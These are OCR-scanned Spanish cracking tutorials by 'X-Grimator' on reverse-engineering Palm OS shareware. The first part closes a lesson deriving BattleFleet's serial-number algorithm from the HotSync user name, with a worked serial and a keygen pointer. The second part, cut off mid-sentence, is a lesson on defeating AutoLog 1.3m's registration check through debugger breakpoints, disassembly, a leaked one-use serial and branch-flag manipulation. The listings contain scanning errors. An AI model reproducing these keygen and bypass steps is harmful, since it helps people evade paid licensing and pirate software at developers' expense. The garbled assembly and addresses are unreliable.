debugger es "case sensitive". Un atb mal puesto y no parará. Me llevó 


mucho averiguarlo). Ahora miramos bien el listado muerto y escribimos estos atb como mero sondeo del cálculo del 
número, a fin de ir viendo los registros: 

atb "DIkGetSyncInfo" 

éste es bueno, nos para la ejecución en el momento en que se obtiene el User con el que HotSync se entiende con la 
PDA. En dos líneas, sería como un login al iniciar una sesión Linux o un usuario en Windows. Ese User ID se guarda 
en el programa HotSync que coordina la PDA con el Pc. Por lo tanto, vemos que nuestro número se genera al partir de 
nuestro nombre de User... adiós, esto atufa a keygen. 

Antes de poner otro atb, debemos analizar un poco el código muerto para ver lo que nos vamos a encontrar, ya que 
ejecutando el debugger con g tras poner ese atb y accediendo a BattleFleet, nos vamos a dar de morros con 

00000610 4e4fa2a9 sysTrapDIkGetS yncInfo 

que es lo que queríamos hacer, justo donde se lee nuestro User. Para no entrar en todo ese proceso, pulsamos t en el 
debugger y vamos directos fuera de esa llamada a API Palm. Luego un il nos mostrará las 10 líneas que vienen por 


delante. Al llegar a 

00000614 486dfbal PEA -1119(A5) 

tenemos algo importante. Un PEA carga algo en memoria, en este caso, el registro de dirección A5-1119. 

Para verlo, le damos a s hasta llegar a la siguiente línea de código y una vez ahi, tecleamos 

dm AS-45f 

que es lo mismo pero en valores hexa (sería igual a ver lo que tiene la dirección AS5-1119). Otras veces está más 
adelante, en cuyo caso sería, por ejemplo, A5+1, y que se expresaría como PEA 1(A5). Pues bien, miramos ahí y ¡oh 
sorpresa! aparece sonriente mi nombre de User, que en mi caso es "PalmOs emulator". 

Luego vemos en 

00000618 4e4fa0c7 sysTrapStrLen 

una llamada a API que computa la longitud de un string, devolviendo tal longitud en bytes. Vaya, vaya, esto promete. 
"La tía rubia que se cargó en la bañera no estaba nada mal ¿verdad?". Pues la verdad es que no... 

Bueno, dejamos aparcado un momento el listado vivo y volvemos a leer el muerto. Nos marea un poco el User ID de un 
lado a otro hasta que llegamos a lo realmente interesante 


00000652 41eeffa8 LEA -88(A6),A0 

nos carga el User ID en A6-58 (hexa) que pasa a AO letra a letra y ATENCIÓN CHICOS 
00000658 34700000ff7c MOVE.W 0(A0,DO.W),-132(A6) 
0000065e 3006 MOVE.W D6,D0 

00000660 0640014d ADDI.W +t333!$14d,D0 

00000664 7200 MOVEQ +0,D1 

00000666 3200 MOVE.W DO0,D1 

00000668 82eeff7c DIVU.W -132(A6),D1 

0000066c 3d41ff7a MOVE.W D1,-134(A6) 

00000670 3d46ff74 MOVE.W D6,-140(A6) 

00000674 3d6effasff78 MOVE.W -88(A6),-136(A6) 
0000067a 302eff78 MOVE.W -136(A6),D0 

0000067e cOeeff7a MULU.W -134(A6),D0 


Ahora es cuando nos preparamos un vodkila, una pizza de esas baratas que hemos dejado en la nevera desde ayer por la 
noche, está fría y nos ha granjeado el apodo de "Carroñero" entre los amigos, un poco de música de agrado 
(últimamente a mí me ha dado por un grupo llamado Lacrimosa. Excelentes los germanos esos) y una infinita paciencia. 
X-Grimator, del grupo La Tristeza de Moldavia (único componente, jeje) os va a exp licar todo ese rollo y por qué la 
madre de Norman Bates tenía un vestido tan feo y una voz tan ronca (sospecho que era un problema de alcoholismo). 
00000658 34700000ff7c MOVE.W 0(A0,D0.W),-132(A6) 

ahí tenemos el primer número del serial. Os cuento (y aquí le debo un favor al dr_funk que me ayudó con esto): la 
estructura del serial es la siguiente: 

UBF+H1+t2-+43+4+5 

donde UBF lo pone siempre, y las variables +1, 42, ++3, 44, +5 se calculan. El guión entre la segunda y la tercera va 
siempre. 

Os decía que en esa línea de código se calcula el valor de la primera variable, y será el valor ASCU del último carácter 
del User ID, en decimal. Después, en 

0000066c 3d41ff7a MOVE.W D1,-134(A6) 

obtenemos la segunda variable (+2) con la siguiente fórmula (++44+333)/41. 

Luego os explico como llegué a esto. Y en 

00000670 3d46ff74 MOVE.W D6,-140(A6) 

nos calcula la variable ++4 sumando en ASCII todos los caracteres que componen el User Id (y que se recoge en D6). 
Después tenemos en 

00000674 3d6effasff78 MOVE.W -88(A6),-136(A6) 

la variable +f3, que es el valor ASCII en decimal del primer caracter del User Id, y por último en 0000067e cUeeff7a 
MULU.W -134(A6),D0 

sacamos la variable 45 multiplicando la 43 por la 42. 

Bueno, así vemos muy bonito todo pero tuvo que haber algo que nos ayudase en todo eso ¿verdad?. El secreto de todo 


esto está en una llamada a API que se repite cinco veces: 
sysTrapStrCat 
que convierte a string un número calculado. La encontramos en 


000006ba 
000006e4 
00000728 
00000752 
00000770 


de ahí que deducimos que nos calcula cinco variables, a las que llamamos +1, 42, 43, +44, 5. Es decir, calcula un 
número y lo pasa a string en ASCII. Y en cuanto a la estructura que va a tener el serial la encontramos 

en 

00000686 41fa022e LEA L67,A0 

0000068a 4850 PEA (AO) 

donde vemos en AO algo así como "UBF.....-.......... ", que para nuestro caso pone un punto (.) por cada numero necesario 
para el User "PalmOs emulator" (nota: os recuerdo que aquí una variable puede tener varios números, repasad unas 
líneas arriba cómo se calculan. Por ejemplo, veremos que +fl es 114). Pues bien, ya sabemos cómo es la estructura del 
serial, dónde calcula las variables y con qué llamada a API pasa el número calculado a número "entendible". 
Francamente, Norman Bates está como una regadera. Sólo él podría protagonizar "Psicosis". 


Si observamos justo debajo de las líneas de código donde se hace una llamada a la API SysTrapStrCat y que os señalé 
arriba, vemos que después de ellas hay siempre un PEA, que os recuerdo que cargaba algo en una dirección. De este 
modo vemos 


000006be 486efffa PEA -6(A6) 
000006€e8 486efffa PEA -6(A6) 
0000072c 486efffa PEA -6(A6) 
00000756 486efffa PEA -6(A6) 
00000780 486efffa PEA -6(A6) 


Santo Dios, pero esto ¡va viento en popa!. Con sólo observar A6-6 en cada uno de ellos vamos sacando los numeritos: 
114 

15 

80 

1461 

1200 

y en 

0000079e 486eff7e PEA -130(A6) 

tenemos nuestro serial entero, para un HotSync UserID de "PalmOs emulator", que sería 
UBF11415-8014611200 

Y la magia está en 


0000079a 486dfbca PEA -1078(A5) 
0000079e 486eff7e PEA -130(A6) 
000007a2 4e4fa2ee sysTrapStrNCaselessCompare 


donde la primera línea tiene mi serial fake y la segunda el correcto, de manera que la llamada a API compara los dos 
strings de n caracteres sin ser case sensitive ni accent sensitive. En este punto intenté modificar la llamada a API por 
otra de FrmAlert, de manera que me presentase una Talt en pantalla (lo que llamamos messagebox en Windows) con el 
número correcto. Pero al pobre X-Grimator siempre le salían errores y no entiende por qué... seguiré en el tema, a ver 
qué ocurre. Bueno, entonces hemos seguido esta táctica: 


1- Os dije cómo se calcula cada variable 

2- Vimos dónde calcula cada una y el numerito que nos da a cambio 

3- Ahora vamos a repasar el cálculo de cada variable. 

Tenemos que observar dos cosas, en primer lugar estas líneas de código, justo al principio del cálculo de 
cada numerito: 


000006b0 302eff7c MOVE.W -132(A6),D0 
000006da 302eff7a MOVE.W -134(A6),D0 
0000071e 302eff78 MOVE.W -136(A6),D0 


00000748 302eff74 MOVE.W -140(A6),D0 
00000772 302eff72 MOVE.W -142(A6),D0 


Son interesantes porque van detrás de una llamada a API llamada StrCopy, que copia un string a otro, y porque luego el 
programa nos da un número a cambio, como vimos (el 114, el 15, etc...). Y en segundo lugar, esas llamadas a memoria 
coinciden con lo que pone en la línea 00000658 y siguientes, que es el algoritmo de keygen, cada una con su variable. 
Echadle un vistazo con calma a las líneas 00000652 (donde carga nuestro User) hasta 0000068a (donde carga la palabra 
UBF) y veréis como el cálculo lo hace como os señalé. Una vez más, el ASM de Motorola muestra todo su potencial y 
claridad de lectura, y personalmente me cae más simpático que el de x86. 

3- El keygen: 

Bueno, llegado a este punto y con el algoritmo hallado, el keygen lo programáis en vuestro lenguaje de programación 
favorito y con los adornos y dibujitos que queráis, u os bajáis de alguna web horrorosa el que os hice yo, que hasta tiene 
un huevo de pascua para que os entretengáis buscándolo. 

... Y POR ESO YO CREO QUE AL BATES LO QUE LE FALTA ES UN BUEN POLVO 

Esto es el final ¿a que ahora ya entendéis mejor la película?. El vodkila no estuvo mal, la McMierda cara e insana, 
como siempre, y Lacrimosa, sublimes haciendo música. 

Lo lastimoso es la protección del John Love éste... cielos, eso de sumar 333 es el típico caso de zombiprogramador. 

En fin, así vamos... 

No quiero acabar mi tercer tuto sobre Palm sin agradecer especialmente la ayuda del dr_funk, único de *+palmwarez con 
ganas de ayudar y que trabajamos juntos en un momento en que yo andaba atascado. Por supuesto, y lo hago siempre, 
un saludo muy grande al irc-hispano en ffcrackers al que le debo mucho, casi todo lo que aprendí y grandes amigos 
como los que menciono siempre, khanete, daimon, seven, Zeven_eT, el gran Pope (casi nuestro padre en esto junto a 
atomraM), Buba_luba, VIKTORY etc, etc... y aprovecho a ver si por fin me ponen un op fijo, que nunca sé cuándo lo 
tengo y cuándo no XD. Ups, olvidaba a un amigo programador que me corrigió el keygen, Pataphalo, y al que me 
enseña Delphi a cambio de que yo le enseñe a crackear, DruidaElAdivino. A todos ellos, mis amigos, los sabios, los que 
ayudan, los que saben, los que no se dejan manipular, los que piensan. Usando mi lema cracker: "Pensad, pensad y 
siempre pensad" 

En algún lugar de Europa, 19/06/02 

By X-Grimator 
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INTRODUCCION 
BANDERAS DE META 


La aventura de un pequeño gorrión 


AUTOLOG 1.3m 


Lección 4 de Palm Reversing by X-Grimator 


AL ATAQUE 


Buenas, mis queridos amigos. Como cada año por estas fechas nos enfrentamos de nuevo al torneo mundial de carreras de 
pájaros, donde este año ha sido el competidor revelación nuestro gorrión Fernandito, tres veces campeón regional y uno nacional. 
Durante un año, Fernandito se ha entrenado duramente estilizando sus plumas, fortaleciendo sus alas y puliendo poco a poco su 
técnica de vuelo. Durante un año, Fernandito sólo se ha alimentado de lombrices bajas en grasas, frutos secos y agua del rocío en 
medio de una espartana preparación hasta lograr que su entrenador, el azor Bertoldo, afirmase que ya sabía más que él. Ahora es 
el momento y Fernandito sólo aspira a las BANDERAS DE META. 


1- El principio: 


Como sabemos, todos los principios son duros, así que para no haceroslo más duro aún, me voy a remitir a las lecciones anteriores 
para extraer nuestro código del programita AutoLogMetric.prc. En el supuesto de que alguien no haya podido leer los otros 
tutoriales por lo que fuese, hago un muy breve resumen: 


a) Herramientas: 


Vamos a necesitar el emulador de Palm, llamado PalmOs Emulator, un editor de ejecutables .pre cuyo nombre es PreEdit 1.0, 
PilotDis para desensamblarlo y prc2bin para ayudar a dividir en trocitos legibles todo esto. En esta lección en concreto nos va a 
ser imprescindible el PalmDebugger, que de forma similar al emulador nos lo bajamos de la web de PalmOs. 


b) Primeros vuelos de Fernandito: 


Analizamos el ejecutable con PreEdit y en las alarm miramos la número 7200 (1c20 hexa), que es la de Bad Boy. Hacemos uso de 
una de las mejores herramientas crack que existen, el bolígrafo, y lo apuntamos en algún lado (¡la vieja escuela cracker!. Es que X- 
Gri lleva mucho ya en esto... je je). 


Metemos el ejecutable en el mismo directorio que prc2bin y desde la consola DOS tecleamos 
pre2bin autologmetric.prc 


En el instante en que le demos a enter, una interminable colección de archivos aparecerá en ese directorio. Sólo nos interesa uno 
(bueno dos, pero el otro es sólo para confirmar algo). El interesante es code0001 (ummm los motivos son obvios) y Talt1c20 lo 
podemos abrir con un editor de texto para confirmar que es nuestro Bad Boy. Si aparece otro code, en seguida notaréis que no es 
el que nos interesa dado el tamaño tan pequeño que tiene (unos bytes apenas, que incluso en el diminuto mundo Palm es ya 
mucho). Tomamos ese code0001.bin y nos lo llevamos al directorio de PilotDis. Tecleamos en consola de MS-DOS 


pilotdis 
pilotdis code0001.bin 


y al darle a enter, ¡pummmm!, nos aparece un archivo llamado code0001.bin.s que puede leerse tranquilamente con el NotePad de 
Windows. Ojo, o cualquier editor de texto, no tiene que ser ese exactamente. Además, como somos crackers y odiamos a 
Microsoft, pues nos programamos uno en Delphi y así aprendemos un poco más. Ya con eso, ejecutamos nuestro Emulador de 
Palm con nuestra ROM tal y como comenté en el último o penúltimo rollo que os metí y cargamos el programita. Tocamos con el 
ratón en el icono horrible del coche infantil, que da grima sólo verlo, y lo que nos encontramos en un programa tan inútil como 
éste y por el que pretenden cobrar tanto (como si fuésemos a crackearlo porque queremos usarlo, je, que ilusos, si esto sólo lo 
hacemos por aprender algo y no tragarnos la basura que echan en la televisión y que atrofia nuestros cerebros más que el vodkila) 
es lo siguiente: 


Ayyyyyyy, esa avaricia de los programadores...¡¡todo por el dinero!!... apenas os diferenciáis de los políticos.Además si os fijáis, 


el primer botón es el de registrarse y luego el de probar. Eso es propaganda subliminal y está prohibida. Desastroso. 
2- Levantando el vuelo. Primeros leñazos: 


Fernandito ya está lo suficientemente preparado y nervioso. Con sus cicatrices de duro entrenar se pone en el nido de salida 
midiendo miradas con sus rivales. Sólo uno puede ganar. Los obstáculos son arduos, la carrera, extenuante, y la meta, sólo para 
uno. Eso ¡oh, sí!, hace arder la juventud en sus venas como un torrente de fuego (esto último suena a heroinómano XD ). Afila las 
garras de gorrioncito, pequeñitas ellas, y le da a Enter Serial $ a ver que pasa. Dos cosas rondan su cabeza: el bad boy message y 
el código que tendrá que tragarse. Vamos allá. Lo que vemos es esto: 


¿Ein?... maldición, ¿qué es eso que aparece debajo de nuestro nick?. Fernandito se ha quedado de piedra al encontrarse en el nido, 
apenas a unos segundos del piar de salida, con un colibrí de grácil vuelo que hizo palidecer a la abubilla campeona del año 
pasado. Volar nervioso, ruido potente en el aleteo, pico aerodinámico... ¡santo Cristo, esto no me lo había advertido el 
entrenador?. Mal empezamos cuando debajo de nuestro nick (apodo o pseudónimo, en español internacional) nos calcula un 
número para no se qué con nuestro serial. Uy, uy, uy que mareo me entraaaaaa... ya estoy pensando en llamadas a api que quizá 
nos hagan falta: 


SysTrapDIkGetSyncInfo: llamada a api de Palm para leer nuestro user del HotSync (conexión con el Pc) 
SysTrapFrmCustomAlert: aparición del mensaje bad boy. 
SysTrapFIdGetTextPtr: captura del string que acabamos de teclear. 


Ahí tenemos pues tres vías para empezar la carrera. Esto se avecina largo. Dos notas que os servirán de utilidad para futuros 
crackeos: 


- FrmCustomAlert es muy similar a FrmAlert, sólo que de tres variables, muestra una en pantalla. A veces modificándolo un poco 
nos puede mostrar la segunda que puede ser ¡sorpresa! nuestro serial buscado. 


- Otras llamadas a api interesantes en futuros crackeos pueden ser: StrCopy (copia string), StrCompare (compara strings, ésta es 
vital), FrmPopupForm (formularios popup). Poco a poco iremos descubriendo otras. 


(NOTA PARA NEWBIES: "string" es una cadena de texto). 
3- Piar de salida ¡comienza la carrera!... ¡pio!: 


De acuerdo, metemos nuestro fake serial y nos encontramos con el mensajito de: 


je, je, como si no lo supiéramos. Le damos a OK y volvemos a la ventanita del serial. Fernandito sale volando en una explosión de 
potencia sacándole dos cuerpos a las demás aves, pero el colibrí no es malo y se le pone a una cabeza apenas. La grasa de sus 
plumas se pliega de tal forma que se asemeja a una bala de plata. Esos brillos del sol en sus ojos... Vamos a abrir code0001.bin.s 
con el block de notas y buscaremos en la opción "Buscar" del NotePad lo siguiente: 


$1c20 


como veis, el procedimiento no varía nunca. Directos a ver dónde aparece el mensaje bad boy que vemos en la imagen de arriba. 
Para los newbies que se pierden ya a estas alturas, deciros que hemos buscado el valor hexadecimal del mensajito. Bien, pues lo 
vemos en 


000060aa 3f3c1c20 MOVE.W ++7200!$1c20,-(A7) 
000060fe 3f3c1c20 MOVE.W +t7200!$1c20,-(A7) 
00006118 3f3c1c20 MOVE.W +7200!$1c20,-(A7) 
y, ya para nota, vemos el de good boy en 

00006008 3f3c1c84 MOVE.W +17300!$1c84,-(A7) 
000060€e4 3f3c1c84 MOVE.W +17300!$1c84,-(A7) 


vaya, ya empezamos con varias llamadas. Aunque no me paré a mirarlo, no podemos olvidar que estamos con un trial de 30 días 
de prueba, así que no me extrañaría que el mensaje saliese en distintas líneas según la fecha en que nos registremos. Pero no deja 
de ser una suposición... Si nos fuéramos como locos al debugger y pusiésemos un breakpoint en SysTrapFrmCustomAlert, 
veríamos que no nos resolvería gran cosa, así que dejamos un momento de lado esta solución y nos vamos a ver qué ocurre con 
nuestro nick. Mientras, Fernandito comienza a sudar. El colibrí intenta hacer juego sucio provocando turbulencias con el 
atronador batir de sus alas. Los demás rivales ya quedan varios metros atrás. Súbitamente una rama de abeto se interpone en su 
camino, pero curtido por entrenamientos castrenses en el gélido invierno, Fernandito inclina ligeremente sus plumas timoneras (o 
sea, las del culo XD ) y en un suave pero seguro requiebro, logra zafarse de las agudas hojas del abeto esquivándolo por debajo. 
El colibrí, en un alarde de virtuosismo, inclina ligeramente su cuerpo y sobrepasa la rama por encima en un giro de noventa 
grados de su vertical, poniéndose de perfil. Un ensordecedor ruido estremece a los espectadores. El mirlo Mamberto, cae 
estrellado contra la rama rompiéndose un ala. Su caída en barrena hace gritar a un polluelo que contemplaba la carrera. Pues a 
probar otro medio de ataque al programa. Vamos a ver qué ocurre si miramos el HotSync. Volvemos a la pantalla de meter el 
serial y ejecutamos el PalmDebugger. Con el comando att conectamos el debugger (mirad que en connection esté seleccionado el 
emulador) y ponemos un breakpoint con atb de esta forma: 


atb "DIkGetSyncInfo"' 
lo que ni corto ni perezoso nos hará llegar a 
00005178 4e4fa2a9 sysTrapDIKGetSyncInfo 


Muy bien. Si escribimos en el debugger il, nos dará un listado de las próximas 10 instrucciones, lo que nos ayuda a localizar 


dónde andamos y apoyarnos con el listado muerto. Pasamos por encima de esa llamada a api con t para ejecutarla de golpe, y 
continuamos instrucción a instrucción con s a través del código. Tras mucho mover, marear, girar, volver, revisar, saltos a 
subrutinas como SetFieldTextFromStr o Map- HotSyncNameToPid, en las label 563 y 586 respectivamente y que el debugger se 
encarga de advertirnos, y tras muchos t y s según nos convenga, vemos en 


00005fce 4fef000a LEA 10(A7),A7 
que carga nuestro número de User Id, lo cual hemos averiguado con un 
dm a7+a 


ya que en hexadecimal, 10 se representa como a. Bueno, mucho tracear pero no hemos encontrado nada interesante que nos 
registre el programa. O si lo hay, al menos yo no lo he visto. Pero encontré otro camino más astuto para reventar este invento. 


4- ¡Horror, enjambre de abejas!: 

Luchando contra viento, ramas y el colibrí, Fernandito percibe algo extraño enfrente a él. En ese preciso instante, el cuervo Rave, 
antiguo campeón mundial, se adelanta a nuestro protagonista y a su rival en un picado acelerado y se sitúa a unos metros de ellos. 
El público pía atronador, salido de sus casillas y con furia. Bertoldo sonríe sin conocer su suerte. Apenas unos segundos más 
tarde, un enjambre de abejas, que se dibujaba como el extraño nubarrón que había visto Fernandito, se abalanza violento sobre el 
ex campeón, desestabilizando sus alas y llenándolo de dolorosos habones. Con una pata encogida, un ojo cerrado y vuelo 
resquebrado, el azor se retira al nido-boxes donde abandona la carrera. Pero este incidente dispersó a los insectos de forma caótica 
y Fernandito y el colibrí pueden pasar sin problemas ese obstáculo antes de que las abejas se reorganicen y eviten continuar la 
carrera a la abubilla que ostentaba el último título mundial, dos gaviotas, un petirrojo y un carrizo. Pues nosotros también 
debemos meternos de lleno en ese nido de abejas. A ver, vamos a recapitular. Nos falla la búsqueda por bad boy message, nos 
falla el HotSync... ummm vamos a tener que usar el último recurso, la llamada a api que lee el texto que escribimos, 


FldGetTextPtr. En el debugger tecleamos ate para borrar todos los breakpoints y lanzamos el programa de nuevo. En la ventana 
que pide el serial tecleamos en el debugger att para reconectarlo y 


atb "FldGetTextPtr" 


con esto lograremos parar la ejecución del programa justo en el momento de leer el número que tecleamos.Tras ello, tecleamos g 
para poder pasar del debugger a nuestro Emulador. Metemos un fake serial, damos a OK y 


00005€e52 4e4fa139 sysTrapFldGetTextPtr 


muy bien, un t en el debugger para ejecutar de golpe esa llamada a api y luego un il para poder seguir a la ez con el listado 
muerto. Nos interesa ese trozo de código, que es 


00005€e52 4e4fa139 sysTrapFldGetTextPtr 
00005e56 2848 MOVEA.L AO0,A4 

00005e58 3f3c1b61 MOVE.W +47009!$1b61,-(A7) 
00005e5c 2f03 MOVE.L D3,-(A7) 

00005e5e 4e4fa180 sysTrapFrmGetObjectindex 
00005e62 5c4f ADDQ.W +6,A7 

00005e64 3f00 MOVE.W DO,-(A7) 


00005€e66 2f03 MOVE.L D3,-(A7) 


00005€68 4e4fa183 sysTrapFrmGetObjectPtr 
00005e6c 5c4f ADDQ.W +t6,A7 

00005e6e 2f08 MOVE.L AO,-(A7) 

00005€70 4e4fa139 sysTrapFldGetTextPtr 
00005874 2648 MOVEA.L A0,A3 

00005876 2f0b MOVE.L A3,-(A7) 

00005e78 2f0c MOVE.L A4,-(A7) 

00005e7a 2f0a MOVE.L A2,-(A7) 

00005€e7c 4ebaff30 JSR L594 


os resalto en negrita las dos lecturas de texto que hace el programa y un salto a subrutina, que según el debugger se llama 
EnteredKey Valid, que ni que decir tiene que es un nombre evocador :0). En 5e56 podemos hacer un dm a0 que veremos nuestro 
fake serial como se copia de a0 a a4. Una línea más abajo carga la etiqueta de Field 1b61 que es la que PreEdit nos dice que pone 
"User Id". No es importante, es un mero concepto de la parte de diseño del programa. Como no sé si os lo dije, recordad que tras 
escribir cualquier instrucción en el debugger, si queréis pasar al emulador, debéis teclear g ya que si no, no podréis pasar de uno a 
otro. De igual modo, esa orden os permite seguir hasta el siguiente breakpoint. Bueno, llegamos al segundo FldGetTextPtr y tras 
pasarlo con un t seguimos mirando línea a línea de código, observando que en 5e76 y siguientes, tenemos en a4 el fake serial y en 
a3 el serial calculado para el nick, de manera que en 5e7c nos tira de cabeza a una subrutina que promete interesante. O sea, mi 
fake y mi numero id en registros de dirección. Y en a2 un churro extraño que se repetirá más adelante. Cuando lleguemos a 5e7c, 
en vez saltarla con t vamos a entrar en ella. De continuar, en 5e86 (mirad vuestro listado muerto) saltaríamos a la L602 que nos 
conduce a 


00005ee4 41fa006e LEA L607,A0 


y que si miramos qué hay en a0 con dm aó en el debugger, nos encontramos con esto: "12180122" que es un número que si lo 
ponemos nos registra el programa para un solo uso, de manera que si salimos y volvemos a entrar ya no nos servirá más ese 
número comodín. Dios, los programadores están fatal de la cabeza... Cuando acabe el tutorial éste voy a estudiar mejor este tema 
y si se cuadra, hago un anexo. En 5eea tenemos una interesante llamada api que compara strings, en Sef2 saltamos a 534, de ahí a 
5136 y 5f3a, que con el RTS de 5£40 nos dispara a 607a, que nos lleva al bad boy de 6118. Bueno, ese es el recorrido del 
programa para que podáis seguirlo en el listado muerto, pero de momento no nos interesa. Quede a título de referencia. Por el 
momento nos vamos a meter de lleno en la subrutina esa de EnteredKeyValid, que parece interesante. Nos encontramos esto: 


00005dae 4e560000 L594 LINK A6,+t0 
00005db2 2f04a MOVE.L A2,-(A7) 
00005db4 2f03 MOVE.L D3,-(A7) 
00005db6 246e0008 MOVEA.L 8(A6),A2 
00005dba 2f2e000c MOVE.L 12(A6),-(A7) 
00005dbe 4e4fa0ce sysTrapStrATol 


00005dc2 2600 MOVE.L DO,D3 


00005dc4 4ebafefe JSR L583 

00005dc8 4400 TST.B DO 

00005dca 584f ADDQ.W +4,A7 
00005dcc 6720 BEQ L596 

00005dce 2f2e000c MOVE.L 12(A6),-(A7) 
00005dd2 4e4fa0ce sysTrapStrATolI 
00005dd6 2600 MOVE.L DO0,D3 
00005dd8 b6aa000a CMP.L 10(A2),D3 
00005ddc 584f ADDQ.W +4,A7 
00005dde 650a BCS L595 

00005de0 b6aa000e CMP.L 14(A2),D3 
00005de4 6204 BHIL595 

00005de6 7001 MOVEQ ++1,DO 
00005des 6016 BRA L598 

00005dea 7000 L595 MOVEQ +0,DO 
00005dec 6012 BRA L598 

00005dee b6aa0012 L596 CMP.L 18(A2),D3 
00005df2 650a BCS L597 

00005df4 b6aa0016 CMP.L 22(A2),D3 
00005df8 6204 BHI L597 

00005dfa 7001 MOVEQ +*1,DO0 
00005dfc 6002 BRA L598 

00005dfe 7000 L597 MOVEQ ++0,DO 
00005€00 261f L598 MOVE.L (A7)+,D3 
00005e02 245f MOVEA.L (A7)+,A2 


00005€e04 4e5e UNLK A6 


00005€06 4e75 RTS 

00005€08 8f DC.B ++143 

00005e09 456e74657265644b6579 DC.B 'EnteredKeyValid' 
00005e13 56616c6964 

que nos hará interesantes llamadas a 

0005cc4 4e560000 L583 LINK A6,+0 

00005cc8 2f0a MOVE.L A2,-(A7) 

00005cca 3£3c1f40 MOVE.W ++8000!$1f40,-(A7) 

00005cce 2f3c7445444b MOVE.L ++1950696523!$7445444b,-(A7) 
00005cd4 4e4fa05f sysTrapDmGetResource 

00005cd8 2448 MOVEA.L A0,A2 

00005cda 200a MOVE.L A2,D0 

00005cde 5c4f ADDQ.W +t6,A7 

00005cde 670c BEQ L584 

00005ce0 2f0a MOVE.L A2,-(A7) 

00005ce2 4e4fa061 sysTrapDmReleaseResource 

00005ce6 7001 MOVEQ ++1,DO0 

00005ce8 584f ADDQ.W +4,A7 

00005cea 6002 BRA L385 

00005cec 7000 L584 MOVEQ +t0,DO 

00005cee 245f L585 MOVEA.L (A7)+,A2 

00005cf0 4e5e UNLK A6 

00005cf2 4e75 RTS 

00005cf4 95 DC.B ++149 

00005cf5 69734170706c69636174 DC.B '¡isApplicationVirginal' 


00005cff 696f6e56697267696e61 


00005d09 6c 


que es una subrutina dentro de ésta llamada IsApplicationVirginal, nombre que debería estar prohibido por sus connotaciones 
pornográficas... XD Ciertamente, Fernandito consiguió salir de una buena maraña de abejas... Entrando en la rutina 

EnteredKey Valid, llegamos a 5dbe, donde hay una llamada api que convierte nuestro string en número íntegro, cosa cierta si 
observamos que dO toma como valor nuestro fake serial pasado a hexadecimal, y justo después, el salto a la aplicación virgen esa, 
que os señalé en 5dc4 en negrita. En esa rutina vemos cómo cargamos algo extrañísimo en 5cca y Scce y como después nos marea 
mucho el registro d0 para que esté en cero y no en uno, incluso poniendo un salto en 5cea. Esto nos está haciendo pensar. Ummm, 
d0 no es igual si está a uno que si está a cero, ¿no?. A ver, seguimos con la ejecución de la rutina hasta volver a la de Entered etc, 
en 5dc8, que vuelve a testear d0. Vaya, vaya... salto si no es igual, comparación, salto, comparación y salto a L597. Bueno, esto se 
dice rápido, claro, pero en la práctica se traduce en muchas horas metiendo números en la Palm, traceando con el debugger, 
viendo qué caminos se toman... no penséis que esto es coser y cantar, ni de broma, pero en eso reside el encanto de este negocio. 
Además, sólo sudando se aprende (Dios, eso de la aplicación virgen ya me hace establecer comparaciones perniciosas...¿sudar, 
aprender?...¿qué es lo que aprendo sudando?... bufff....). Ahora nos toca examinar el tramo final. Andiamo presto. 


5- Recta final. En el horizonte, las banderas de meta: 


La cosa se pone que arde. El público pía ensordecedor, una golondrina cae agotada, la cigiteña se retira con problemas de 
maniobrabilidad, dos palomas mensajeras son descalificadas por volar a cota no reglamentaria y tan sólo nuestro valiente 
Fernandito y su competidor el colibrí se aproximan a la meta. Ovaciones, tensión, esfuerzo. Se sacan mutuamente una cabeza, 
media cabeza, pugnando arrolladores por la bandera de meta ¿cómo acabaré éste lance?. Pasamos ahora mismo a verlo... el 
secreto está en LA BANDERA. Situémonos. Habíamos repasado la ejecución del programa, nos habíamos metido en una rutina 
de nosequé de validkey y a su vez nos desviamos un poco a la rutina de una virgen, digoo00000o, a la rutina virgen XD. Si 
salimos de esta última (¿salir de una virgen?. En USA me meterían en la cárcel sólo por esta frase...) y volvemos a la rutina de 
Enteredkey Valid, nos topamos con este interesante pedazo de código: 


00005dc8 4a00 TST.B DO 

00005dca 584f ADDQ.W +4,A7 
00005dcc 6720 BEQ L596 

00005dce 2f2e000c MOVE.L 12(A6),-(A7) 
00005dd2 4e4fa0ce sysTrapStrATolI 
00005dd6 2600 MOVE.L DO0,D3 
00005dd8 b6aa000a CMP.L 10(A2),D3 
00005ddc 584f ADDQ.W +t4,A7 
00005dde 650a BCS L595 

00005de0 b6aa000e CMP.L 14(A2),D3 
00005de4 6204 BHI L595 

00005de6 7001 MOVEQ ++1,DO 
00005des 6016 BRA L598 


00005dea 7000 L595 MOVEQ +*0,DO 


00005dec 6012 BRA L598 

00005dee b6a20012 L596 CMP.L 18(A2),D3 
00005df2 650a BCS L597 

00005df4 b6aa0016 CMP.L 22(A2),D3 
00005df8 6204 BHI L597 

00005dfa 7001 MOVEO +*1,DO 
00005dfc 6002 BRA L598 

00005dfe 7000 L597 MOVEQ +0,DO 
00005€e00 261f L598 MOVE.L (A7)+,D3 
00005€e02 245f MOVEA.L (A7)+,A2 
00005€e04 4e5e UNLK A6 

00005€e06 4e75 RTS 


El primer salto que he señalado en negrita lo hacemos queramos o no, ya que d0 lo compara con cero y así es. En la comparación 
de 5dee nos compara nuestro fake serial de d3 con algo que en apariencia no es nada y salta 1f carry set C (bes), que no es el caso. 
Lo interesante viene ahora, en 


00005df4 b6aa0016 CMP.L 22(A2),D3 
00005df8 6204 BHI L597 


ya que tras comparar mi fake serial con algo que seguimos sin saber qué es, me establece un salto branch if high, esto es, salta si 
es mayor que cero, salto que efectivamente se produce, y que nos lleva a 


00005dfe 7000 L597 MOVEQ +0,DO 
00005€e00 261f L598 MOVE.L (A7)+,D3 
00005€e02 245f MOVEA.L (A7)+,A2 
00005€e04 4e5e UNLK A6 

00005€e06 4e75 RTS 


que nos saca ya de la rutina NO SIN ANTES poner d0 con un valor de cero en L597. Pero ¿qué ocurriría si no hiciésemos el salto 
de 5df8?, pues que seguiríamos en 


00005dfa 7001 MOVEO +*1,DO 


00005dfc 6002 BRA L598 


evitando el L597 y no sólo eso, si no moviendo el byte de d0 a uno. Y de ahí volvemos a la rutina principal que nos marea hasta el 
bad boy. Es ahora cuando vuestra sagacidad cracker lo ha visto claro. Si d0 es cero el camino es uno, si es uno el camino es otro. 
El secreto, mis niños, está en la bandera: aprovechamos que el colibrí es daltónico y confunde la bandera con una mariposa. 
Fernandito tiene la carrera ganada. A ver, hago un inciso para newbies. En toda esta milonga, hay una cosa a muy grandes rasgos 
que se llaman flag. No me quiero meter en el asunto porque excede este tutorial. Es igual a una señal de paso a nivel: si está 
